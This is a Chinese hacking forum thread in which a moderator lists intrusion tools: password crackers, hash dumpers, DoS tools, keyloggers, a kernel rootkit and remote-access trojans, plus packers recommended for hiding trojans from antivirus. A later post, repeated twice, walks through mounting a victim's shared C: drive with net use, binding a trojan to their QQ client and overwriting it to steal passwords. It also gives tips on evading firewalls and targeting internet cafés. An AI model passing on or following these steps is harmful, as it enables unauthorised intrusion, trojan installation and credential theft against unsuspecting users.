SMBCrack 是小榕为流光5开发的测试原型，和以往的SMB（共享）暴力破解工具不同，没有采用系统的API，而是使用了SMB的协议。Windows 2000可以在同一个会话内进行多次密码试探 ... 《入侵全攻略》

socks 利用这工具安装木马，即使网关重新低格硬盘木马也在嘿嘿 *

SocksCap 把socks5代理转化为万能代理

SPC.zip 可以直接显示出远程win98共享资源密码的东东 *

WMIhack 基于WMI服务进行账号密码的东东(不需要ipc)

skmontor snake的注册表监视器（特酷的)

sql1.exe mssql溢出程序2

sql2.exe mssql溢出程序3

SqlExec mssql客户端

SuperScan GUI界面的优秀扫描器

syn syn攻击第一高手

upx120 特好的压缩软件，常用来压缩木马躲避杀毒软件

wget 命令行下的http下载软件

Win2kPass2 win2k的密码大盗

Winnuke 攻击rpc服务的软件(win2ksp0/1/2/3+winnt+winxp系统不稳定)

smbnuke 攻击netbios的软件(win2ksp0/1/2/3+winnt+winxp系统死机)

WinPcap_2_3 nmap,arpsniffer等等都要用这个

WinPcap_2_3_nogui.exe 无安装界面自动安装的WinPcap_2_3（命令行版) *

scanbaby2.0 能对80%的mail服务利用漏洞列账号密码破解(超酷哦，去看rfc里有mail弱点说明) *

SuperDic_V31 非常全面的黑客字典生成器

Getadmin win2k+sp3配置的权限提升程序(不错!!!) *

whoami 了理自己的权限

FsSniffer 巨好的非交换机sniffer工具

twwwscan 命令行下巨好的cgi扫描器

TFTPD32 给远方开tftp服务的主机传文件(当然要有个shell)

RangeScan 自定义cgi漏洞的GUI扫描器

pwdump2 本地抓winnt/2k密码散列值(不可缺)

pwdump3 远程抓winnt/2k密码散列值(不可缺)

procexpnt 查看系统进程与端口关联(GUI界面) *

nc 已经不是简单的telnet客户端了

CMD.txt 有什么cmd命令不懂就查查它 *

fport 命令行下查看系统进程与端口关联(没有GUI界面的procexpnt强)

BrutusA2 全功能的密码破解软件,支持telnet,ftp,http等服务的口令破解

cmd.reg 文件名自动补全的reg文件(命令行:按TAB键自动把sys补全为system,再按一次就变为system32)

regshell 命令行下的注册表编辑器

nscopy 备份员工具(当你是Backup Operators组的用户时有时你的权限会比admin还大)

session.rar 有了win/nt2000目标主机的密码散列值,就可以直接发送散列值给主机而登录主机 *

klogger.exe 一个几kb的击键记录工具,运行后会在当前目录生成KLOGGER.TXT文件 *

smb2 发动smb的中间人MITM攻击的工具，在session中插入自己的执行命令 *

xptsc.rar winxp的远程终端客户端(支持win2000/xp)

SQLhack.zip 相当快的mssql密码暴力破解器

mssql 相当快的mssql密码暴力破解器

ntcrack.zip 利用获取到的MD4 passwd hash破解帐号密码

SQLSniffer.rar MSsql的密码明文嗅探器

TelnetHack.rar 在拥有管理员权限的条件下，远程打开WIN2000机器的Telnet服务

RFPortXP.exe XP下关联端口与进程的程序

SQLTools.rar mssql工具包

ServiceApp.exe 远程安装/删除服务

hgod 具有SYN/DrDos/UDP/ICMP/IGMP拒绝服务测试功能的选项

hscan 小型综合扫描器(支持cisco,mysql,mssql,cgi,rpc,ipc(sid),ftp,ssh,smtp等等相当全面)

HDoor.rar ping后门(icmp后门)

SIDUserEnum.exe 利用sid得到用户列表(小榕的那个sid有时不能完全列举出来) *

RPC_LE.exe 利用rpc溢出使win2k重启(对sp3+sp4hotfix有效) *

r3389.exe 查询Terminal Server更改后的端口（1秒内） *

smbsniffer.exe 获取访问本地主机网页的主机散列值(支持截获内网主机散列) *

NetEnum.exe 通过3389端口+空连接获取对方主机大量信息 *

aspcode.exe 经测试最有效的asp溢出程序第二版(对sp2有效)

sslproxy 针对使用ssl加密协议的代理（扫描器通过它就可以扫描ssl主机了!!!!) *

lsa2 在lsa注册表键里获取winnt/2k的明文密码包括sqlserver的(打了补丁就没用了) *

psu.exe 用指定进程的权限打开指定的程序

ldap.msi ldap 轻量级目录服务客户端,通过389端口获取主机大量信息如账号列表 *

rootkit 从系统底层完美隐藏指定进程，服务，注册表�I并可以端口绑定的内核级win2k后门!!! *

Xscan 一款强大的扫描软件，可以和流光相媲美采用多线程方式对指定IP地址段（或单机）进行安全漏洞检测，支持插件功能，提供了图形界面和命令行两种操作方式，扫描内容包括：远程操作系统类型及版本，标准端口状态及端口BANNER信息，SNMP信息，CGI漏洞，IIS漏洞，RPC漏洞，SQL-SERVER、FTP-SERVER、SMTP-SERVER、POP3-SERVER、NT-SERVER弱口令用户，NT服务器NETBIOS信息、注册表信息等。扫描结果保存在/log/目录中，index_*.htm为扫描结果索引文件。增SSL插件，用于检测SSL漏洞；升级PORT、HTTP、IIS插件...（

x-way2.5 采用多线程形式对服务器系统进行漏洞扫描和安全测试工具，X-WAY多个版本均在Win2000下开发，建议用户使用时候也在Win2000环境，以发挥最佳效果...（中文版）《扫描工具，别忘了x-way2.5》

SSS 俄罗斯出的，最好的扫描软件，还有分析，有漏洞描述，速度慢了点，它是我见地的最好的扫描软件！

NAMP 我一直用的是个这命令行的扫描软件，有win，LINUX版的，又快，又好，支持TCP,UDP,ICMP,安全扫描不会留下扫描日志！

下面的软件本来不想收进来给大家看，因为顶级黑客不入侵个人电脑，基本不用别人写的木马，肯定是人手一个（自己编写的木马）
没有任何杀毒软件能查出来的。
**********************************************************************************************

使用木马改造工具：
ASPack 这个是使用木马都一定要会用的工具，它能压缩木马，不让杀毒软件查出来！

UPX 非常好的可执行文件压缩软件，支持的格式包括 atari/tos，djgpp2/coff，dos/com，dos/exe，dos/sys，rtm32/pe，tmt/adam，watcom/le，win32/pe，Linux/i386 等等，压缩比率也非常的高 ...
**************************************************************************************
菜鸟级木马类：
黑境
近墨者
魔法控制
灰鸽子
风雪国产后门风雪，此版根据一些网友的建议，改进了几个功能，一个是可以配置是否自动共享C盘的功能，另一个是在查看菜单上加上了密码是否用*号来表示，同时修正了1.3版本在打开网址时按取消键仍会打开网址的BUG...（
网络神偷一款远程控制软件，更新速度较快，可以访问局域网中的计算机，连接稳定上传下载速度快，但是会被很多杀毒厂商看成木马病毒追杀，要求使用者有自己的FTP空间 ... （中文版
冰河 3
广外男生
广外女生
Peep
一套运用反端口技术的远程监控软体，运用此原理可以达到一般远程控制软体所无法达到之功能，例如可对区域网路及有架设防火墙的电脑作监控，被控端电脑将具有自动回传连线之功能，通讯埠可任意动态修改，及具有独立连线，也就是说除您本人其他人无法连线监控。其他的功能还有上线通知、连线速率调整、远端档案总管、远端桌面监控、
远端进程管理、远端登录编辑、网页通报服务、DDoS攻击、还有被控端程式设置精灵、有常驻选择、文件捆绑及连线方式等选项...（中文版）
木牛隐型版运行后，服务器上硬盘C盘符共享（完全控制权限）开启ADMIN$、IPC$共享，开启TELNET服务，自动创建一个管理员权限帐号：IUSR_COMPUTER 密码：IUSR_COMPUTER...该版本自动修改注册表，重起后自动运行
IE'en 通过IE远程控制的软件。它可以远程遥控IE动作，可以直接截取IE和任何服务器之间的数据通讯，你在IE中输入的用户名、密码等机密信息都在此列，它可以以纯文本方式存储或发送这些信息，一旦启动这一软件，远端被监控的浏览器窗口中进行的任何输入输出都会显示在本地IE'en中。运行ieen_s.exe（注：服务端）需要管理员权限
盗密高手监视被监视端（装了此程序的电脑）上QQ、邮箱等各种密码，并发送到您设置的邮箱

B3层发表时间: 11/05 22:12

回复: abctm [abctm]

版主

▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲
入侵后偷QQ的方法
▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲
在命令提示符下（即，win9x的dos命令行下）
输入 nbtstat -A xxx.xxx.xxx.xxx
会得到如下提示信息：
NetBios remote machine name table
name __type _________status
clovea <00> unique registered
mmxxcc <00> group registered
clovea <03> unique registered
mac address = 00-00-00-00-00-00
这里就告诉了你对方的注册用户名，和主机名均为clovea
mmxxcc为对方注册公司。
第三步，在命令提示符下输入，
net view \\xxx.xxx.xxx.xxx
这时会显示对方的共享资源。
比如
c xx c
说明对方的c盘是共享的。
第四步，接下来输入
net use z: \\xxx.xxx.xxx.xxx\c
这时，你的z:就成为对方c盘的应像了，可以直接用dos命令操作
如copy z:\program files\oicq.exe d:\oicq.exe
也可以到到windows界面，打开我的电脑，直接操作。
第5步，查明对方的常用软件，如oicq，winamp，等等
然后把对方的常用软件和木马进行捆绑，如把oicq.exe 和G_sever.exe（冰河2.2服务端)。
第6步，偷梁换柱，把你捆绑好了的oicq.exe覆盖对方的oicq.exe,这样对方每次用oicq的时候就不知不觉的运行了你的木马，嘿嘿。
第7步，等着你的冰河给你发mail吧，呵呵，不过大家最好还是别用冰河，冰河的万能密码太恐怖了，还有，默认的木马端口一定要记得改啊。
备注，如果对方拥有天网之内的防火墙的话，你是查不到对方的共享资源和信息的。
如果你已经成功的侵入，而又能肯定对方要装防火墙的话，请把木马端口限制在1024以下。
以上方法虽然是利用对方的错误配置等进攻，并且懂点安全知识的都不会共享自己的资源的，但是经我实验证实，有很多网吧为了方便，硬盘都是共享了的，如果对方有路由的话，就先用ip欺骗吧！
首先需要得知对方的ip
可以用oicq来查对方ip，也可以在聊天室内查。
工具很多，随便都可以抓到一大把。
第二步，在命令提示符下（即，win9x的dos命令行下）
输入 nbtstat -A xxx.xxx.xxx.xxx
会得到如下提示信息：
NetBios remote machine name table
name __type _________status
clovea <00> unique registered
mmxxcc <00> group registered
clovea <03> unique registered
mac address = 00-00-00-00-00-00
这里就告诉了你对方的注册用户名，和主机名均为clovea
mmxxcc为对方注册公司。
第三步，在命令提示符下输入，
net view \\xxx.xxx.xxx.xxx
这时会显示对方的共享资源。
比如
c xx c
说明对方的c盘是共享的。
第四步，接下来输入
net use z: \\xxx.xxx.xxx.xxx\c
这时，你的z:就成为对方c盘的应像了，可以直接用dos命令操作
如copy z:\program files\oicq.exe d:\oicq.exe
也可以到到windows界面，打开我的电脑，直接操作。
第5步，查明对方的常用软件，如oicq，winamp，等等
然后把对方的常用软件和木马进行捆绑，如把oicq.exe 和G_sever.exe（冰河2.2服务端)。
第6步，偷梁换柱，把你捆绑好了的oicq.exe覆盖对方的oicq.exe,这样对方每次用oicq的时候就不知不觉的运行了你的木马，嘿嘿。
第7步，等着你的冰河给你发mail吧，呵呵，不过大家最好还是别用冰河，冰河的万能密码太恐怖了，还有，默认的木马端口一定要记得改啊。
备注，如果对方拥有天网之内的防火墙的话，你是查不到对方的共享资源和信息的。
如果你已经成功的侵入，而又能肯定对方要装防火墙的话，请把木马端口限制在1024以下。
以上方法虽然是利用对方的错误配置等进攻，并且懂点安全知识的都不会共享自己的资源的，但是经我实验证实，有很多网吧为了方便，硬盘都是共享了的，如果对方有路由的话，就先用ip欺骗吧！

B4层发表时间: 11/05 22:17

回复: abctm [abctm]

版主

？？

B5层发表时间: 11/05 22:58

回复: abctm [abctm]

版主

！！！

B6层发表时间: 11/06 21:24

回复: abctm [abctm]

版主

！！！